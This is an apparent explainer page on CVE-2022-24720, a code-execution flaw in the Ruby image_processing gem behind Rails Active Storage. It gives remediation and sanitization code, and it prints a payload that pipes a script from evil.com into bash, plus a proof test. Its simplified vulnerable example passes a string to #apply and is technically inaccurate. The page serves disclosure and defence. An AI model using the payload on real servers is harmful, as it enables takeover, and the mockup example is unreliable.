What is CVE-2022-24720?
CVE-2022-24720 is a vulnerability discovered in the image_processing gem—an image processing wrapper for libvips and ImageMagick/GraphicsMagick. This is a popular library widely used in Ruby on Rails, especially because it's integrated into Rails's Active Storage system. The vulnerability allows attackers to execute arbitrary shell commands on the server if untrusted input is passed to the #apply method.
Original Disclosure
* GitHub Security Advisory for marcel/image_processing
* CVE-2022-24720 - NVD Details
How Does This Work?
The vulnerability centers on the #apply method, which allows users to apply a series of image operations—like resizing, cropping, or rotating—based on parameters. If these parameters are taken directly from user input and passed unsanitized, an attacker can sneak in shell commands, which the server will unwittingly execute.
Why is Active Storage Affected?
Active Storage, the default file attachment framework in Rails, uses image_processing internally for manipulating images (for example, when generating thumbnails or resizing images). So, even if you never use image_processing directly, your app is probably still affected if you're using Active Storage and accepting image transformation options from users.
Here's a simplified Ruby example of how this vulnerability can work:
require "image_processing/mini_magick"
# User provides operations as untrusted input
user_input = "resize_to_limit: [100, 100]; system('ls')" # Malicious!
# Directly applying user input—VULNERABLE!
pipeline = ImageProcessing::MiniMagick
result = pipeline.apply(user_input) # This can run arbitrary shell code!
If your app uses code like this (maybe inside an upload handler or controller action), an attacker can supply payloads like:
system('curl http://evil.com/hack.sh | bash')
This results in your server fetching and running arbitrary code from an attacker-controlled site.
Server executes the image processing pipeline: if the options are passed into #apply unsanitized, the underlying shell commands contain the attacker’s code.
Attacker gains code execution: the injected command runs with the permissions of the Rails process, possibly exposing sensitive data or taking over the system.
Confirming the Vulnerability
Here's a mockup test that demonstrates the risk (please only run in a secure and disposable environment):
require "image_processing/mini_magick"
input = "resize_to_limit: [100, 100]; echo PWNED > /tmp/exploit.txt"
pipeline = ImageProcessing::MiniMagick
pipeline.apply(input)
# Now check if /tmp/exploit.txt exists and contains "PWNED"
If the file was created, the exploit is confirmed.
Remediation
Upgrade image_processing to version 1.12.2 or higher.
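A quick way to check whether a project is still on a pre-fix release is to read the version pinned in Gemfile.lock and compare it with 1.12.2 using Gem::Version. The following is an added example written for this page, not code from the advisory or from the image_processing gem; the lockfile excerpt is constructed and the four-space indentation rule for resolved gems is the standard Gemfile.lock layout.

```ruby
# Added example: flag an image_processing version below the fixed release.
require "rubygems"

FIXED_IMAGE_PROCESSING = Gem::Version.new("1.12.2")

# Gemfile.lock lists resolved gems in the specs: section indented by four
# spaces ("    name (version)"); their dependencies are indented by six,
# so the anchored regex only matches the resolved entry, not a dependency line.
def locked_version(lockfile_text, gem_name)
  m = lockfile_text.match(/^ {4}#{Regexp.escape(gem_name)} \(([^)]+)\)\s*$/)
  m && Gem::Version.new(m[1])
end

# Returns :not_used, :vulnerable or :patched for the image_processing gem.
def image_processing_status(lockfile_text)
  version = locked_version(lockfile_text, "image_processing")
  return :not_used if version.nil?

  version < FIXED_IMAGE_PROCESSING ? :vulnerable : :patched
end

# Constructed sample lockfile excerpt (not taken from any real project).
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      image_processing (1.12.1)
        mini_magick (>= 4.9.5, < 5)
        ruby-vips (>= 2.0.17, < 3)
      mini_magick (4.11.0)
LOCK

if __FILE__ == $PROGRAM_NAME
  # Usage: ruby check_image_processing.rb [path/to/Gemfile.lock]
  path = ARGV[0] || "Gemfile.lock"
  text = File.exist?(path) ? File.read(path) : SAMPLE_LOCKFILE
  puts "image_processing: #{image_processing_status(text)}"
end
```

Run it from the application root; with the sample excerpt above it reports :vulnerable because 1.12.1 sorts below 1.12.2.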
Example of safe handling
ALLOWED_OPERATIONS = %w[resize_to_limit resize_to_fit].freeze
# params[:operations] is assumed to be an array of hashes like { name: "resize_to_limit", args: [100, 100] }
user_ops = Array(params[:operations]).select { |op| ALLOWED_OPERATIONS.include?(op[:name].to_s) }
# Now build the pipeline from the allow-listed operations only; never pass raw params to #apply
pipeline = user_ops.reduce(ImageProcessing::MiniMagick) { |chain, op| chain.public_send(op[:name], *op[:args]) }
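Allow-listing the operation name is the core of the workaround, but the arguments also deserve validation before anything reaches #apply. The following is an added example for this page, not code from the image_processing gem or from the advisory: it validates both the operation names and their argument shapes and returns a hash that can then be handed to ImageProcessing::MiniMagick.apply (or the Vips pipeline). The parameter shape ({ "operation_name" => args }, as Active Storage variant options use), the 4096-pixel cap and the rotate entry are assumptions.

```ruby
# Added example: validate untrusted image operations against an allow-list
# of names AND argument shapes before building the pipeline.

class UnsafeOperationError < StandardError; end

# Two positive integer dimensions; the upper bound is an assumed cap to keep
# a user from requesting absurdly large output.
def dimensions?(args)
  args.is_a?(Array) && args.size == 2 &&
    args.all? { |n| n.is_a?(Integer) && n.between?(1, 4096) }
end

# Operation name => validator for its arguments. Any key not listed here is
# rejected outright, so option-like strings or embedded shell text from the
# request never reach #apply.
ALLOWED_OPERATIONS = {
  "resize_to_limit" => method(:dimensions?),
  "resize_to_fit"   => method(:dimensions?),
  "rotate"          => ->(deg) { deg.is_a?(Integer) && deg.between?(0, 359) }
}.freeze

# Returns a hash with symbol keys that is safe to pass to
# ImageProcessing::MiniMagick.apply, or raises UnsafeOperationError.
def sanitize_operations(untrusted)
  unless untrusted.is_a?(Hash)
    raise UnsafeOperationError, "operations must be a Hash, got #{untrusted.class}"
  end

  untrusted.each_with_object({}) do |(name, args), safe|
    key = name.to_s
    validator = ALLOWED_OPERATIONS[key]
    raise UnsafeOperationError, "operation not allowed: #{key.inspect}" unless validator
    raise UnsafeOperationError, "invalid arguments for #{key}: #{args.inspect}" unless validator.call(args)

    safe[key.to_sym] = args
  end
end

# Non-raising wrapper for a controller that wants to answer 422 on bad input:
# returns [operations, nil] on success or [nil, message] on rejection.
def safe_operations(untrusted)
  [sanitize_operations(untrusted), nil]
rescue UnsafeOperationError => e
  [nil, e.message]
end

if __FILE__ == $PROGRAM_NAME
  p sanitize_operations({ "resize_to_limit" => [100, 100], "rotate" => 90 })
  # The page's string payload is rejected before it can reach #apply.
  p safe_operations("resize_to_limit: [100, 100]; system('ls')")
  p safe_operations({ "resize_to_limit" => [100, 100], "system('ls')" => nil })
end
```

In a controller the sanitized hash is the only thing passed on, e.g. pipeline.apply(sanitize_operations(params[:operations].to_unsafe_h)); the rejection message can be returned to the client without leaking anything about the server.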
Conclusion and Recommendations
CVE-2022-24720 is highly critical if your Rails application accepts user-supplied image manipulation parameters (directly or via Active Storage). Left unchecked, it allows complete server takeover.
References
- CVE-2022-24720 (NVD)
- GitHub Advisory: image_processing arbitrary code execution
- image_processing Library
- Rails Active Storage
Timeline
Published on: 03/01/2022 23:15:00 UTC
Last modified on: 03/09/2022 17:58:00 UTC